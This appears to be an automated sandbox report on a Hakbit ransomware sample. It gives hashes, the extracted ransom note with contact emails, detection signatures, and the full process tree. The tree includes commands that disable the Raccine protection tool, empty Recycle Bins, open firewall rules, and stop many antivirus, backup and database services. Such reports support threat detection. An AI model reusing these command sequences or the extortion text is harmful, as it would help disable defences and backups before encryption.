SyncApteka.bin

General

Target      SyncApteka.bin.exe
Filesize    128KB
Completed   19-04-2021 17:54
Score       10/10
MD5         9606a0bdc7a04dcf4d8625345c2875cd
SHA1        34c37511ef2105aedf55eda054e89210757f51ec
SHA256      aa3e530d4567c1511126029fac0562ba8aa4ead0a01aceea169ade3e38a37ea7

Malware Config

Extracted

Path         C:\Users\Admin\Desktop\RESTORE_FILES_INFO.txt
Family       hakbit
Ransom Note  Your system has been encrypted. To regain access to your files and decrypt them, you need to contact us at the addresses decoder44@rambler.ru alpinbovuar@protonmail.com (please note that mail sent from mail.ru and Yandex may have difficulty reaching ProtonMail) or via the Telegram account that we will give you after getting in touch with your employees. We also have data from your databases, backups, your employees' Telegram accounts, your customers' personal data and access to payment systems. Key Identifier: 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 Number of files that were processed is: 76
Emails       decoder44@rambler.ru
             alpinbovuar@protonmail.com

Signatures 22

Defense Evasion
Discovery
Persistence
  • Hakbit

    Description

    Ransomware which encrypts files using AES, first seen in November 2019.

  • Downloads MZ/PE file
  • Modifies Windows Firewall

    Tags

    TTPs

    Modify Existing Service
  • Modifies extensions of user files
    SyncApteka.bin.exe

    Description

    Ransomware generally changes the extension on encrypted files.

    Tags

    Reported IOCs

    description | ioc | process
    File renamed | C:\Users\Admin\Pictures\InitializeExport.raw => C:\Users\Admin\Pictures\InitializeExport.raw.ejqvfp | SyncApteka.bin.exe
    File opened for modification | C:\Users\Admin\Pictures\InitializeExport.raw.ejqvfp | SyncApteka.bin.exe
    File renamed | C:\Users\Admin\Pictures\StepCompare.png => C:\Users\Admin\Pictures\StepCompare.png.ejqvfp | SyncApteka.bin.exe
    File opened for modification | C:\Users\Admin\Pictures\StepCompare.png.ejqvfp | SyncApteka.bin.exe
  • Deletes itself
    cmd.exe

    Reported IOCs

    pid | process
    3344 | cmd.exe
  • Drops startup file
    SyncApteka.bin.exe

    Reported IOCs

    description | ioc | process
    File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mystartup.lnk | SyncApteka.bin.exe
  • Modifies file permissions
    icacls.exe (3 processes)

    Tags

    TTPs

    File Permissions Modification

    Reported IOCs

    pid | process
    2284 | icacls.exe
    524 | icacls.exe
    928 | icacls.exe
  • Launches sc.exe

    Description

    Sc.exe is a Windows utility to control services on the system.

  • Enumerates physical storage devices

    Description

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

    TTPs

    System Information Discovery
  • Discovers systems in the same network
    net.exe

    Tags

    TTPs

    Remote System Discovery

    Reported IOCs

    pid | process
    4360 | net.exe
  • Kills process with taskkill
    taskkill.exe (multiple processes; PIDs listed under Reported IOCs)

    Tags

    Reported IOCs

    pid | process
    2504 | taskkill.exe
    2480 | taskkill.exe
    2316 | taskkill.exe
    3780 | taskkill.exe
    3388 | taskkill.exe
    3848 | taskkill.exe
    412 | taskkill.exe
    2396 | taskkill.exe
    940 | taskkill.exe
    3508 | taskkill.exe
    2088 | taskkill.exe
    3188 | taskkill.exe
    3828 | taskkill.exe
    2592 | taskkill.exe
    2108 | taskkill.exe
    2808 | taskkill.exe
    3920 | taskkill.exe
    2252 | taskkill.exe
    3068 | taskkill.exe
    3124 | taskkill.exe
    3128 | taskkill.exe
    3020 | taskkill.exe
    3272 | taskkill.exe
    2392 | taskkill.exe
    3100 | taskkill.exe
    2572 | taskkill.exe
    4052 | taskkill.exe
    3056 | taskkill.exe
    1356 | taskkill.exe
    3268 | taskkill.exe
    2656 | taskkill.exe
    2516 | taskkill.exe
    952 | taskkill.exe
    3928 | taskkill.exe
    2272 | taskkill.exe
    2492 | taskkill.exe
    3540 | taskkill.exe
    3940 | taskkill.exe
    4020 | taskkill.exe
    3680 | taskkill.exe
    3484 | taskkill.exe
    3888 | taskkill.exe
    2796 | taskkill.exe
    2816 | taskkill.exe
    936 | taskkill.exe
    3196 | taskkill.exe
    2084 | taskkill.exe
    3976 | taskkill.exe
  • Modifies registry class
    rundll32.exe

    Reported IOCs

    description | ioc | process
    Key created | \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000_Classes\Local Settings | rundll32.exe
    Key created | \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\MuiCache | rundll32.exe
  • Modifies registry key
    reg.exe

    TTPs

    Modify Registry

    Reported IOCs

    pid | process
    528 | reg.exe
  • Opens file in notepad (likely ransom note)
    notepad.exe

    Tags

    Reported IOCs

    pid | process
    4592 | notepad.exe
  • Runs net.exe
  • Runs ping.exe
    PING.EXE

    TTPs

    Remote System Discovery

    Reported IOCs

    pid | process
    4076 | PING.EXE
  • Suspicious behavior: EnumeratesProcesses
    SyncApteka.bin.exe

    Reported IOCs

    pid | process
    1756 | SyncApteka.bin.exe   (identical row reported 64 times)
  • Suspicious use of AdjustPrivilegeToken
    SyncApteka.bin.exe, taskkill.exe (multiple processes), powershell.exe (2 processes)

    Reported IOCs

    description | pid | process
    Token: SeDebugPrivilege | 1756 | SyncApteka.bin.exe
    Token: SeDebugPrivilege | 412 | taskkill.exe
    Token: SeDebugPrivilege | 3680 | taskkill.exe
    Token: SeDebugPrivilege | 3828 | taskkill.exe
    Token: SeDebugPrivilege | 940 | taskkill.exe
    Token: SeDebugPrivilege | 2796 | taskkill.exe
    Token: SeDebugPrivilege | 3128 | taskkill.exe
    Token: SeDebugPrivilege | 2272 | taskkill.exe
    Token: SeDebugPrivilege | 3388 | taskkill.exe
    Token: SeDebugPrivilege | 2480 | taskkill.exe
    Token: SeDebugPrivilege | 2816 | taskkill.exe
    Token: SeDebugPrivilege | 2316 | taskkill.exe
    Token: SeDebugPrivilege | 2252 | taskkill.exe
    Token: SeDebugPrivilege | 3196 | taskkill.exe
    Token: SeDebugPrivilege | 4020 | taskkill.exe
    Token: SeDebugPrivilege | 2344 | powershell.exe
    Token: SeDebugPrivilege | 3068 | taskkill.exe
    Token: SeDebugPrivilege | 888 | powershell.exe
    Token: SeDebugPrivilege | 2592 | taskkill.exe
    Token: SeDebugPrivilege | 2656 | taskkill.exe
    Token: SeDebugPrivilege | 3100 | taskkill.exe
    Token: SeDebugPrivilege | 3268 | taskkill.exe
    Token: SeDebugPrivilege | 2492 | taskkill.exe
    Token: SeDebugPrivilege | 3124 | taskkill.exe
    Token: SeDebugPrivilege | 1356 | taskkill.exe
    Token: SeDebugPrivilege | 2088 | taskkill.exe
    Token: SeDebugPrivilege | 3020 | taskkill.exe
    Token: SeDebugPrivilege | 2084 | taskkill.exe
    Token: SeDebugPrivilege | 2108 | taskkill.exe
    Token: SeDebugPrivilege | 3188 | taskkill.exe
    Token: SeDebugPrivilege | 2392 | taskkill.exe
    Token: SeDebugPrivilege | 3272 | taskkill.exe
    Token: SeDebugPrivilege | 952 | taskkill.exe
    Token: SeDebugPrivilege | 3484 | taskkill.exe
    Token: SeDebugPrivilege | 3928 | taskkill.exe
    Token: SeDebugPrivilege | 3940 | taskkill.exe
    Token: SeDebugPrivilege | 3508 | taskkill.exe
    Token: SeDebugPrivilege | 2808 | taskkill.exe
    Token: SeDebugPrivilege | 3780 | taskkill.exe
    Token: SeDebugPrivilege | 2516 | taskkill.exe
    Token: SeDebugPrivilege | 3888 | taskkill.exe
    Token: SeDebugPrivilege | 936 | taskkill.exe
    Token: SeDebugPrivilege | 2396 | taskkill.exe
    Token: SeDebugPrivilege | 2504 | taskkill.exe
    Token: SeDebugPrivilege | 4052 | taskkill.exe
    Token: SeDebugPrivilege | 3848 | taskkill.exe
    Token: SeDebugPrivilege | 3540 | taskkill.exe
    Token: SeDebugPrivilege | 3976 | taskkill.exe
    Token: SeDebugPrivilege | 2572 | taskkill.exe
    Token: SeDebugPrivilege | 3920 | taskkill.exe
  • Suspicious use of FindShellTrayWindow
    SyncApteka.bin.exe, notepad.exe

    Reported IOCs

    pid | process
    1756 | SyncApteka.bin.exe
    4592 | notepad.exe
  • Suspicious use of SendNotifyMessage
    SyncApteka.bin.exe

    Reported IOCs

    pid | process
    1756 | SyncApteka.bin.exe
  • Suspicious use of WriteProcessMemory
    SyncApteka.bin.exe, net1.exe

    Reported IOCs

    description | pid | process | target process
    PID 1756 wrote to memory of 412 | 1756 | SyncApteka.bin.exe | taskkill.exe   (reported 3 times)
    PID 1756 wrote to memory of 1112 | 1756 | SyncApteka.bin.exe | reg.exe   (reported 3 times)
    PID 1756 wrote to memory of 528 | 1756 | SyncApteka.bin.exe | reg.exe   (reported 3 times)
    PID 1756 wrote to memory of 1048 | 1756 | SyncApteka.bin.exe | schtasks.exe   (reported 3 times)
    PID 1756 wrote to memory of 1196 | 1756 | SyncApteka.bin.exe | cmd.exe   (reported 3 times)
    PID 1756 wrote to memory of 684 | 1756 | SyncApteka.bin.exe | cmd.exe   (reported 3 times)
    PID 1756 wrote to memory of 664 | 1756 | SyncApteka.bin.exe | netsh.exe   (reported 3 times)
    PID 1756 wrote to memory of 1808 | 1756 | SyncApteka.bin.exe | sc.exe   (reported 3 times)
    PID 1756 wrote to memory of 1320 | 1756 | SyncApteka.bin.exe | sc.exe   (reported 3 times)
    PID 1756 wrote to memory of 1456 | 1756 | SyncApteka.bin.exe | sc.exe   (reported 3 times)
    PID 1756 wrote to memory of 1844 | 1756 | SyncApteka.bin.exe | netsh.exe   (reported 3 times)
    PID 1756 wrote to memory of 1604 | 1756 | SyncApteka.bin.exe | sc.exe   (reported 3 times)
    PID 1756 wrote to memory of 948 | 1756 | SyncApteka.bin.exe | sc.exe   (reported 3 times)
    PID 1756 wrote to memory of 1636 | 1756 | SyncApteka.bin.exe | conhost.exe   (reported 3 times)
    PID 1756 wrote to memory of 1336 | 1756 | SyncApteka.bin.exe | sc.exe   (reported 3 times)
    PID 1756 wrote to memory of 652 | 1756 | SyncApteka.bin.exe | sc.exe   (reported 3 times)
    PID 1756 wrote to memory of 108 | 1756 | SyncApteka.bin.exe | net.exe   (reported 3 times)
    PID 1756 wrote to memory of 1696 | 1756 | SyncApteka.bin.exe | net.exe   (reported 3 times)
    PID 1756 wrote to memory of 888 | 1756 | SyncApteka.bin.exe | powershell.exe   (reported 3 times)
    PID 1756 wrote to memory of 792 | 1756 | SyncApteka.bin.exe | net1.exe   (reported 3 times)
    PID 1756 wrote to memory of 1852 | 1756 | SyncApteka.bin.exe | conhost.exe   (reported 3 times)
    PID 108 wrote to memory of 1768 | 108 | net1.exe | net1.exe
  • System policy modification
    SyncApteka.bin.exe

    Tags

    TTPs

    Modify Registry

    Reported IOCs

    description | ioc | process
    Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\LocalAccountTokenFilterPolicy = "1" | SyncApteka.bin.exe
    Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1" | SyncApteka.bin.exe
Processes 598
  • C:\Users\Admin\AppData\Local\Temp\SyncApteka.bin.exe
    "C:\Users\Admin\AppData\Local\Temp\SyncApteka.bin.exe"
    Modifies extensions of user files
    Drops startup file
    Suspicious behavior: EnumeratesProcesses
    Suspicious use of AdjustPrivilegeToken
    Suspicious use of FindShellTrayWindow
    Suspicious use of SendNotifyMessage
    Suspicious use of WriteProcessMemory
    System policy modification
    PID:1756
    • C:\Windows\system32\taskkill.exe
      "taskkill" /F /IM RaccineSettings.exe
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:412
    • C:\Windows\system32\reg.exe
      "reg" delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Raccine Tray" /F
      PID:1112
    • C:\Windows\system32\reg.exe
      "reg" delete HKCU\Software\Raccine /F
      Modifies registry key
      PID:528
    • C:\Windows\system32\schtasks.exe
      "schtasks" /DELETE /TN "Raccine Rules Updater" /F
      PID:1048
    • C:\Windows\system32\cmd.exe
      "cmd.exe" /c rd /s /q %SYSTEMDRIVE%\\$Recycle.bin
      PID:1196
    • C:\Windows\system32\cmd.exe
      "cmd.exe" /c rd /s /q D:\\$Recycle.bin
      PID:684
    • C:\Windows\system32\netsh.exe
      "netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes
      PID:664
    • C:\Windows\system32\sc.exe
      "sc.exe" config Dnscache start= auto
      PID:1808
    • C:\Windows\system32\sc.exe
      "sc.exe" config FDResPub start= auto
      PID:1320
    • C:\Windows\system32\sc.exe
      "sc.exe" config SQLTELEMETRY start= disabled
      PID:1456
    • C:\Windows\system32\netsh.exe
      "netsh" advfirewall firewall set rule group="File and Printer Sharing" new enable=Yes
      PID:1844
    • C:\Windows\system32\sc.exe
      "sc.exe" config upnphost start= auto
      PID:948
    • C:\Windows\system32\sc.exe
      "sc.exe" config SSDPSRV start= auto
      PID:1604
    • C:\Windows\system32\sc.exe
      "sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled
      PID:1636
    • C:\Windows\system32\sc.exe
      "sc.exe" config SstpSvc start= disabled
      PID:1336
    • C:\Windows\system32\sc.exe
      "sc.exe" config SQLWriter start= disabled
      PID:652
    • C:\Windows\system32\net.exe
      "net.exe" start Dnscache /y
      PID:108
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 start Dnscache /y
        PID:1768
    • C:\Windows\system32\net.exe
      "net.exe" stop bedbg /y
      PID:1696
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop bedbg /y
        PID:1216
    • C:\Windows\system32\net.exe
      "net.exe" start FDResPub /y
      PID:888
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 start FDResPub /y
        PID:964
    • C:\Windows\system32\net.exe
      "net.exe" stop EhttpSrv /y
      PID:1952
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop EhttpSrv /y
        PID:2088
    • C:\Windows\system32\net.exe
      "net.exe" stop MSSQL$SQLEXPRESS /y
      PID:920
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop MSSQL$SQLEXPRESS /y
        PID:2072
    • C:\Windows\system32\net.exe
      "net.exe" stop MMS /y
      PID:308
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop MMS /y
        PID:2096
        • C:\Windows\system32\net1.exe
          C:\Windows\system32\net1 stop ReportServer /y
          PID:4064
    • C:\Windows\system32\net.exe
      "net.exe" stop MSSQL$SQL_2008 /y
      PID:1852
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop MSSQL$SQL_2008 /y
        PID:2064
    • C:\Windows\system32\net.exe
      "net.exe" start SSDPSRV /y
      PID:792
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 start SSDPSRV /y
        PID:1588
    • C:\Windows\system32\net.exe
      "net.exe" start upnphost /y
      PID:860
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 start upnphost /y
        PID:2284
    • C:\Windows\system32\net.exe
      "net.exe" stop ekrn /y
      PID:560
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop ekrn /y
        PID:2452
    • C:\Windows\system32\net.exe
      "net.exe" stop avpsus /y
      PID:1140
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop avpsus /y
        PID:2396
    • C:\Windows\system32\net.exe
      "net.exe" stop ccSetMgr /y
      PID:2220
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop ccSetMgr /y
        PID:2516
    • C:\Windows\system32\net.exe
      "net.exe" stop McAfeeDLPAgentService /y
      PID:2332
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop McAfeeDLPAgentService /y
        PID:2552
    • C:\Windows\system32\net.exe
      "net.exe" stop mozyprobackup /y
      PID:2344
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop mozyprobackup /y
        PID:2712
    • C:\Windows\system32\net.exe
      "net.exe" stop RTVscan /y
      PID:2260
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop RTVscan /y
        PID:2704
    • C:\Windows\system32\net.exe
      "net.exe" stop SavRoam /y
      PID:2240
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop SavRoam /y
        PID:2524
    • C:\Windows\system32\net.exe
      "net.exe" stop ccEvtMgr /y
      PID:2200
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop ccEvtMgr /y
        PID:2500
    • C:\Windows\system32\net.exe
      "net.exe" stop DefWatch /y
      PID:2180
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop DefWatch /y
        PID:2508
    • C:\Windows\system32\net.exe
      "net.exe" stop NetBackup BMR MTFTP Service /y
      PID:2160
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop NetBackup BMR MTFTP Service /y
        PID:2420
    • C:\Windows\system32\net.exe
      "net.exe" stop QBFCService /y
      PID:2384
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop QBFCService /y
        PID:2668
    • C:\Windows\system32\net.exe
      "net.exe" stop BMR Boot Service /y
      PID:2140
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop BMR Boot Service /y
        PID:2468
    • C:\Windows\system32\net.exe
      "net.exe" stop Intuit.QuickBooks.FCS /y
      PID:2440
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop Intuit.QuickBooks.FCS /y
        PID:1708
    • C:\Windows\system32\net.exe
      "net.exe" stop MSSQL$SYSTEM_BGC /y
      PID:2576
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop MSSQL$SYSTEM_BGC /y
        PID:2688
    • C:\Windows\system32\net.exe
      "net.exe" stop EPSecurityService /y
      PID:2588
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop EPSecurityService /y
        PID:2272
    • C:\Windows\system32\net.exe
      "net.exe" stop BackupExecDiveciMediaService /y
      PID:2920
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop BackupExecDiveciMediaService /y
        PID:2596
    • C:\Windows\system32\net.exe
      "net.exe" stop MSSQL$PRACTTICEBGC /y
      PID:3132
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop MSSQL$PRACTTICEBGC /y
        PID:2584
    • C:\Windows\system32\net.exe
      "net.exe" stop BackupExecDeviceMediaService /y
      PID:3116
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop BackupExecDeviceMediaService /y
        PID:2728
    • C:\Windows\system32\net.exe
      "net.exe" stop “Sophos System Protection Service” /y
      PID:3100
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop “Sophos System Protection Service” /y
        PID:3088
    • C:\Windows\system32\net.exe
      "net.exe" stop MSSQL$PRACTICEMGT /y
      PID:3092
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop MSSQL$PRACTICEMGT /y
        PID:2724
    • C:\Windows\system32\net.exe
      "net.exe" stop BackupExecAgentBrowser /y
      PID:3076
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop BackupExecAgentBrowser /y
        PID:2352
    • C:\Windows\system32\net.exe
      "net.exe" stop “Sophos Safestore Service” /y
      PID:2624
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop “Sophos Safestore Service” /y
        PID:2572
    • C:\Windows\system32\net.exe
      "net.exe" stop audioendpointbuilder /y
      PID:2692
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop audioendpointbuilder /y
        PID:1216
    • C:\Windows\system32\net.exe
      "net.exe" stop MSSQL$ECWDB2 /y
      PID:2716
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop MSSQL$ECWDB2 /y
        PID:2772
    • C:\Windows\system32\net.exe
      "net.exe" stop BackupExecAgentAccelerator /y
      PID:2524
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop BackupExecAgentAccelerator /y
        PID:2712
    • C:\Windows\system32\net.exe
      "net.exe" stop “Sophos Message Router” /y
      PID:2212
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop “Sophos Message Router” /y
        PID:3172
    • C:\Windows\system32\net.exe
      "net.exe" stop unistoresvc_1af40a /y
      PID:2152
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop unistoresvc_1af40a /y
        PID:1768
    • C:\Windows\system32\net.exe
      "net.exe" stop MSSQL$BKUPEXEC /y
      PID:2460
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop MSSQL$BKUPEXEC /y
        PID:1520
    • C:\Windows\system32\net.exe
      "net.exe" stop ARSM /y
      PID:2112
    • C:\Windows\system32\net.exe
      "net.exe" stop “Sophos MCS Client” /y
      PID:2336
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop “Sophos MCS Client” /y
        PID:2556
    • C:\Windows\system32\net.exe
      "net.exe" stop msexchangeimap4 /y
      PID:2516
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop msexchangeimap4 /y
        PID:2280
    • C:\Windows\system32\net.exe
      "net.exe" stop “intel(r) proset monitoring service” /y
      PID:2232
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop “intel(r) proset monitoring service” /y
        PID:2852
    • C:\Windows\system32\net.exe
      "net.exe" stop MSOLAP$TPSAMA /y
      PID:2512
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop MSOLAP$TPSAMA /y
        PID:2764
    • C:\Windows\system32\net.exe
      "net.exe" stop AcrSch2Svc /y
      PID:2400
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop AcrSch2Svc /y
        PID:2688
    • C:\Windows\system32\net.exe
      "net.exe" stop “Sophos MCS Agent” /y
      PID:2504
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop “Sophos MCS Agent” /y
        PID:2696
    • C:\Windows\system32\net.exe
      "net.exe" stop msexchangeadtopology /y
      PID:2172
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop msexchangeadtopology /y
        PID:3532
    • C:\Windows\system32\net.exe
      "net.exe" stop “aphidmonitorservice” /y
      PID:2164
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop “aphidmonitorservice” /y
        PID:3832
    • C:\Windows\system32\net.exe
      "net.exe" stop MSOLAP$TPS /y
      PID:2420
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop MSOLAP$TPS /y
        PID:3752
    • C:\Windows\system32\net.exe
      "net.exe" stop “Zoolz 2 Service” /y
      PID:2568
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop “Zoolz 2 Service” /y
        PID:3628
    • C:\Windows\system32\net.exe
      "net.exe" stop ReportServer$TPSAMA /y
      PID:2540
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop ReportServer$TPSAMA /y
        PID:3808
    • C:\Windows\system32\net.exe
      "net.exe" stop “Sophos Health Service” /y
      PID:2536
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop “Sophos Health Service” /y
        PID:436
    • C:\Windows\system32\net.exe
      "net.exe" stop MSExchangeSRS /y
      PID:2428
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop MSExchangeSRS /y
        PID:3800
    • C:\Windows\system32\net.exe
      "net.exe" stop W3Svc /y
      PID:2600
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop W3Svc /y
        PID:4000
    • C:\Windows\system32\net.exe
      "net.exe" stop MSOLAP$SYSTEM_BGC /y
      PID:2132
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop MSOLAP$SYSTEM_BGC /y
        PID:4032
    • C:\Windows\system32\net.exe
      "net.exe" stop “Veeam Backup Catalog Data Service” /y
      PID:1624
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop “Veeam Backup Catalog Data Service” /y
        PID:3784
    • C:\Windows\system32\net.exe
      "net.exe" stop ReportServer$TPS /y
      PID:2436
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop ReportServer$TPS /y
        PID:3724
    • C:\Windows\system32\net.exe
      "net.exe" stop “Sophos File Scanner Service” /y
      PID:1640
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop “Sophos File Scanner Service” /y
        PID:3676
    • C:\Windows\system32\net.exe
      "net.exe" stop MSExchangeSA /y
      PID:2292
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop MSExchangeSA /y
        PID:3664
    • C:\Windows\system32\net.exe
      "net.exe" stop UI0Detect /y
      PID:1644
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop UI0Detect /y
        PID:3868
    • C:\Windows\system32\net.exe
      "net.exe" stop MSOLAP$SQL_2008 /y
      PID:572
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop MSOLAP$SQL_2008 /y
        PID:2548
    • C:\Windows\system32\net.exe
      "net.exe" stop “Symantec System Recovery” /y
      PID:2092
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop “Symantec System Recovery” /y
        PID:2264
    • C:\Windows\system32\net.exe
      "net.exe" stop ReportServer$SYSTEM_BGC /y
      PID:916
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop ReportServer$SYSTEM_BGC /y
        PID:3704
    • C:\Windows\system32\net.exe
      "net.exe" stop “Sophos Device Control Service” /y
      PID:1512
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop “Sophos Device Control Service” /y
        PID:2940
    • C:\Windows\system32\net.exe
      "net.exe" stop MSExchangeMTA /y
      PID:1872
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop MSExchangeMTA /y
        PID:3372
    • C:\Windows\system32\net.exe
      "net.exe" stop SstpSvc /y
      PID:2196
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop SstpSvc /y
        PID:4020
    • C:\Windows\system32\net.exe
      "net.exe" stop msftesql$PROD /y
      PID:2156
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop msftesql$PROD /y
        PID:3432
    • C:\Windows\system32\net.exe
      "net.exe" stop “SQLsafe Filter Service” /y
      PID:1716
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop “SQLsafe Filter Service” /y
        PID:3112
    • C:\Windows\system32\net.exe
      "net.exe" stop ReportServer$SQL_2008 /y
      PID:1588
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop ReportServer$SQL_2008 /y
        PID:3964
    • C:\Windows\system32\net.exe
      "net.exe" stop SMTPSvc /y
      PID:840
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop SMTPSvc /y
        PID:3356
    • C:\Windows\system32\net.exe
      "net.exe" stop “Sophos Clean Service” /y
      PID:2248
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop “Sophos Clean Service” /y
        PID:3364
    • C:\Windows\system32\net.exe
      "net.exe" stop MSExchangeMGMT /y
      PID:368
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop MSExchangeMGMT /y
        PID:4048
    • C:\Windows\system32\net.exe
      "net.exe" stop POP3Svc /y
      PID:2076
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop POP3Svc /y
        PID:3288
    • C:\Windows\system32\net.exe
      "net.exe" stop MsDtsServer110 /y
      PID:2104
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop MsDtsServer110 /y
        PID:4004
    • C:\Windows\system32\net.exe
      "net.exe" stop “SQLsafe Backup Service” /y
      PID:2148
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop “SQLsafe Backup Service” /y
        PID:2392
    • C:\Windows\system32\net.exe
      "net.exe" stop ReportServer /y
      PID:2096
    • C:\Windows\system32\net.exe
      "net.exe" stop SamSs /y
      PID:2056
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop SamSs /y
        PID:3512
    • C:\Windows\system32\net.exe
      "net.exe" stop “Sophos AutoUpdate Service” /y
      PID:2108
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop “Sophos AutoUpdate Service” /y
        PID:2780
    • C:\Windows\system32\net.exe
      "net.exe" stop MSExchangeIS /y
      PID:2080
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop MSExchangeIS /y
        PID:3448
    • C:\Windows\system32\net.exe
      "net.exe" stop NetMsmqActivator /y
      PID:320
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop NetMsmqActivator /y
        PID:1356
    • C:\Windows\system32\net.exe
      "net.exe" stop MsDtsServer100 /y
      PID:3064
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop MsDtsServer100 /y
        PID:3148
    • C:\Windows\system32\net.exe
      "net.exe" stop “SQL Backups /y
      PID:3056
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop “SQL Backups /y
        PID:3464
    • C:\Windows\system32\net.exe
      "net.exe" stop “Enterprise Client Service” /y
      PID:3048
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop “Enterprise Client Service” /y
        PID:2388
    • C:\Windows\system32\net.exe
      "net.exe" stop EraserSvc11710 /y
      PID:3040
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop EraserSvc11710 /y
        PID:3416
    • C:\Windows\system32\net.exe
      "net.exe" stop “Sophos Agent” /y
      PID:3032
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop “Sophos Agent” /y
        PID:4028
    • C:\Windows\system32\net.exe
      "net.exe" stop MSExchangeES /y
      PID:3024
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop MSExchangeES /y
        PID:3524
    • C:\Windows\system32\net.exe
      "net.exe" stop IISAdmin /y
      PID:3016
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop IISAdmin /y
        PID:2700
    • C:\Windows\system32\net.exe
      "net.exe" stop MsDtsServer /y
      PID:3008
